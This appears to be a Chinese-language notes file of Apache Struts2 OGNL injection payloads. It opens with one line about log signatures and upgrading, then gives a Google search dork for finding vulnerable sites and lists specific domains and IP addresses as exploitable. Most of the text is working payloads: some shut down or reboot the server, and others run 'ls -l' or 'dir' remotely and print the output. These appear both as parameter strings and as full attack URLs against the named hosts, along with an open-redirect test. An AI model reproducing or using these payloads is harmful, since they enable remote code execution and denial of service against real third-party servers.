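请将以下内容复制出来,保存到记事本中查看。
以下是针对 Apache Struts2 的 OGNL 表达式注入测试记录(`redirect:` 前缀参数,以及写在参数名中的 OGNL 表达式)。排查时可在访问日志中检索 `redirect:%{`、`_memberAccess`、`allowStaticMethodAccess` 等特征;修复方式是将 Struts2 升级到已修复的版本。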

google搜索:
inurl:common/common_info.action?wid=

存在漏洞的网站:
http://www.gzdfzw.cn/common/common_info.action?wid=201211200902001011
http://222.240.202.201/sdm/plat/login.action


?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'Shutdown','-s','-t','1'})).start()}  

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ls\40\u002dl\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'dir\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))


http://222.240.202.201/sdm/plat/login.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'Shutdown','-r'})).start()}
http://202.65.223.84/companySearchDetail.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'Shutdown','-r'})).start()}


?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'Shutdown','-r'})).start()}


http://localhost:8080/InfomactionPlatform_Test/saveBusiness?redirect:http://www.yahoo.com/